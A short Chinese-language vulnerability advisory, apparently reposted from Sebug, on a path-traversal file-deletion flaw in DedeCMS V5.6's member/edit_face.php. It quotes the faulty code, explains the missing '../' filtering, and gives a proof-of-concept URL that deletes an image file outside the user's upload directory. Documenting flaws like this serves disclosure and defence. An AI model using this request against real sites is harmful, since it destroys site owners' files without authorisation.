漏洞版本:

DedeCmsV5.6

漏洞描述:

DedeCMS内容管理系统软件采用XML名字空间风格核心模板:模板全部使用文件形式保存,对用户设计模板、网站升级转移均提供很大的便利,健壮的模板标签为站长DIY 自己的网站提供了强有力的支持。
edit_face.php

else if($dopost=='delold')  //45行
{
        if(empty($oldface))
        {
                ShowMsg("没有可删除的头像!", "-1");
                exit();
        }
        $userdir = $cfg_user_dir.'/'.$cfg_ml->M_ID;
        if(!ereg('^'.$userdir, $oldface))
        {
                $oldface = '';
        }
        if(eregi("\.(jpg|gif|png)$", $oldface) && file_exists($cfg_basedir.$oldface))
        {
                @unlink($cfg_basedir.$oldface);
        }

只判断oldface 前面是否在目录下,没包括过滤 ../
但有验证  \.(jpg|gif|png)$  ,所以只能删除  jpg , gif ,png 类型的文件

测试方法:

@Sebug.net   dis
本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    1. http://ssvdb.com/member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif
posted on 2014-03-21 15:26  milantgh  阅读(456)  评论(0编辑  收藏  举报